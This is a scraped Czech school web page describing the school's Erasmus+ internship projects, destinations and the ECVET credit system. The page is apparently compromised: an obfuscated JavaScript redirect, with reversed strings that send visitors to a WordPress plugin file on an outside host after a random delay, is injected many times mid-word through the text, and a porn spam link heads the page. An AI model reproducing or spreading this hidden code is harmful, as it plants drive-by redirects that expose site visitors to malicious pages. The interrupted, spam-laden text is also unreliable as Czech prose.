curvy ebony teen spunked.www.tamilkamaveri.monster

era6

 

 

Základní informace

Erasmus+ je vzdělávací program Evropské unie na období 2014–2020  na podporu vzdělávání, odborné přípravy, mládeže a sportu v Evropě.

era6

 

 

 

 

Cílem programu Erasmus+ je přispět k dosažení cílů strategie Evropa 2020 pro růst, zaměstnanost, sociální rovnost a začlenění, jakož i cílů strategického rámce EU pro vzdělávání a odbornou přípravu ET2020.

Projekty mobility osob/ Odborné vzdělávání
era6

 

 
Aktivita je určena žákům středních odborných škol, učilišť, vyšších odborných škol, absolventům těchtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to typů škol a osobám zaměstnaným v organizacích aktivních v oblasti odborného vzdělávání a přípravy či osobám zodpovědným za odborné vzdělávání a přípravu. Jedná se o zahraniční praktické stáže v podnicích, odborných školách nebo organizacích zabývajících se odborným vzděláváním a přípravou.

ECVET
era6

 

 

 

 

Evropský systém kreditů pro odborné vzdělávání a přípravu zvyšuje kvalitu vnitrostátní i mezinárodní mobility a podporuje spolupráci škol a podniků u nás i v zahraničí. Jednotky učení, které tvoří základní kámen celého systému, popisují, jaké znalosti, dovednosti a kompetence si má účastník stáže osvojit. ECVET tak usnadňuje uznávání výsledků učení, zvyšuje transparentnost kvalifikací a podporuje celoživotní učení.

 

Projekty mobilit na naší škole:

Studenti naší školy všech stupňů i oborů jsou  již během studia seznamováni a konfrontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}továni s požadavky praxe, a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to jak v rámci přímé výuky, tak i na řadě mimoškolních aktivit, které ale škola zajišťuje nebo spoluorganizuje. Jedná se např. o výstavy, módní přehlídky, produkce prezentací, výtvarné a oděvní soutěže atd.

Se změnou požadavků na naše absolventy, kdy již nestačí pouze klasické odborné technické zaměření na výrobu oděvů nebo modelování, se snažíme rozšířit zaměření u SOŠ i VOŠ  tak, abychom zajistili umístění našich absolventů podle požadavků na trhu práce, a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to o předměty se zaměřením na podnikatelství v oboru, reklamní tvorbu, oděvní design ve spojení se špičkovým řemeslným zpracováním, propagační grafiku, prezentační tvorbu, organizaci a zajišťování módních přehlídek, osobnostní stylistiku aj.

Vývoj předpokládá, že malé a střední firmy budou zajišťovat kvalifikované práce a individuální tvorbu, zvláště v oblasti módního návrhářství a oděvní technologie v národním i nadnárodním měřítku, v celém jejím rozsahu /návrh, realizace, prezentace, prodej /.

Pro naše absolventy obou typů vzdělání toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to znamená nutnost odborně i profesně umět obstát v náročné tuzemské i mezinárodní konkurenci na trhu práce, využít vlastní teoretický i odborný potenciál pro své uplatnění, umět se přizpůsobit aktuálním okolnostem a využít veškeré dostupné možnosti, které nabízí současná tržní poptávka.

Absolventi musí organizačně i odborně zvládnout pracovat pro více zákazníků současně, reagovat na jejich požadavky i na požadavky trhu, umět se zapojit po odborné stránce i do strategie prodeje a marketingu.

Pro tytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to cíle se jako škola snažíme zajistit maximum. S obtížemi zajišťujeme odborné praxe studentů u našich partnerů v ČR, v rámci odborné přípravy žáků a přípravy  k absolutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toriu  spolupracujeme s nejrůznějšími partnery z oboru i mimo něj – Hospodářkou komorou , Asociací textilního průmyslu, malými firmami.

Partnery pro odborné praxe žáků  jsou i  ostatní odborné školy a instituce u nás i v zahraničí a jednou z důležitých praxí je i zahraniční mobilita.

S organizací zahraničních odborných stáží máme zkušenosti již od roku 1996 v projektech Leonardo da Vinci a od roku 2014 v navazujícím programu ERASMUS+.

 

Systém organizace a přípravy stáží včetně výběru partnerů pro spolupráci je velmi propracovaný a ověřený. Kvalitní je i validace  / ECVET, Europass Mobility, Certifikace, další dokumenty Europassu / a následná evaluace všech projektů.

 

Pro většinu partnerů jsme reciproční organizací a naše spolupráce je dlouhodobá nad rámec vlastních stáží, což zvyšuje její kvalitu a přinos jak pro školu, tak přímé i nepřímé účastníky.

 

Stáže jsou nabízeny všem studentům a žákům naší školy. Pravidla a podmínky  pro účast v projektu jsou transparentně a jasně nastavena a zveřejněna na informačním panelu projektu a informačních schůzkách.

Stejně tak je vždy předem stanovený pracovní program pro jednotlivé destinace tak, aby jejich přínos pro účastníky byl vždy co nevyšší.

 

Naše snaha o zvýšení odborné úrovně školy, pedagogů i studentů je z naší strany dále podporována i dalšími vlastními aktivitami, mezinárodní a místní spoluprací, granty ESF, zřizovatelem MHMP aj.

Více informací získáte na odkazech:

http://www.naerasmusplus.cz/

http://ec.europa.eu/programmes/erasmus-plus/news-events_cs

www.dzs.cz/cz/ecvet

www.europass.cz/mobilita

www.europass.cz
era5
projekt č. 2016-1-CZ01-KA102-023243 
era6
 

 

 

 

 

 

 

 

VOSONSPSO Erasmus+

Dvouletý projekt krátkodobých odborných stáží studentů a pedagogů ve výzvě ERASMUS+2016  byl realizován v období dvou školních roků 2016/2017 a 2017/2018  a ukončen v dubnu 2018 pod  názvem:

Praxe, pramen inspirace?

(Practice, a wellspring of inspiration?)

V projektu bylo zrealizováno celkem 8 mobilit pro 29 studentů SOŠ i VOŠ do 7 destinací.

Celkem bylo aktivně zapojeno 40 účastníků.

Odborná stáž  byla  určena k realizaci společného projektu se zahraničními studenty a pedagogy.

Výstupem byla vždy prezentace projektu v místě (oděvní model, výtvarný objekt, doprovodná technická dokumentace, PW dokument o průběhu projektu, výstava, fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todokumentace) a odevzdání závěrečné zprávy.

Inspirací byla významná událost /osoba /jiné v dané destinaci, při uplatnění všech znalostí a dovedností získaných během studia a doplněných právě pobytem na pracovní stáži.

Víkend byl využit pro získání inspiračních zdrojů, odborných informací z reálného života ve městě, výstavy, kulturní akce. Pro zajištění jednak dohledu nad nezletilými studenty, jednak klidnějšího pobytu méně zkušených účastníků vyjeli jako dohled a pomoc stážistům také 4 vyučující.

Protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tože úroveň školy je taková, jaká je úroveň jejich pedagogů, dbáme i na soustavné vzdělávání našich odborných vyučujících. Protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to také mimo studentů vyjeli do třech destinací zdokonalovat své odborné portfolio i 4 vyučující a 3 naopak jeli vyučovat své odborné předměty na naše partnerské školy. Své poznatky pak přenesli do výuky našich studentů i ke zlepšení ŠVP.
eratab

 

 

 

 

 

 

 

 

 

 

Ve všech destinacích získali účastníci jednak mnoho odborných poznatků, dovedností a informací, jednak poznali jiný způsob odborné přípravy v rámci EU, zlepšili si své osobní i odborné portfolio a CV, čímž jsou lépe připraveni na zapojení do pracovního procesu v ČR nebo EU.

Kromě toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toho si účastníci pobytem v jiné zemi zvýšili jazykové znalosti a blíže se seznámili s jinou kulturou.

Někteří účastníci budou pokračovat ve studiu na VŠ v zahraničí.

Všechny stáže byly velmi úspěšné. Byly výborně hodnoceny jak účastníky, tak přijímací organizací, stejně jako při prezentaci výsledků po návratu, kdy studenti a pedagogové naší školy, jakož i veřejností při Dnech otevřených dveří nebo na akci Erasmus+Day 17. 4. 2018 spojenou s velkou módní přehlídkou SKILLS ocenili kvalitu realizovaného projektu.

S některými výstupy se můžete seznámit jednak zde, dále na FB projektu VOSONSPSO Erasmus+ , na informačním panelu v budově školy, na www nebo při osobní návštěvě.

Výsledná prezentace – BROŽURA projektu s názvem PRAXE, PRAMEN INSPIRACE?!

Prezentace jednotlivých destinaci:

SOUPTHAMPTON / inspirace: místní architektura / Prezentace ke stažení

BIRMINGHAM  / inspirace: místní vodní kanály / Prezentace ke stažení

NORIMBERK  / inspirace: Albrecht Dürer / Prezentace ke stažení

VOLOS /inspirace: místní cukrovinky /Prezentace ke stažení / Video

PORTO / inspirace: místní keramika /Prezentace 1 ke stažení / Prezentace 2 ke stažení / Prezentace 3 ke stažení

TAMPERE / inspirace: sníh + bavlna / Video

CANNES / inspirace: západ slunce nad mořem / Video

 

Na uzavřený projekt z výzvy 2016 pokračujeme v njiž  schváleném opět dvouletém projektu Erasmus+ výzva 2018

reference: Ing. Věra Tasoulasová

koordinátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor projektu

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:vera.tasoulasova@vosonspso.cz“>vera.tasoulasova@vosonspso.cz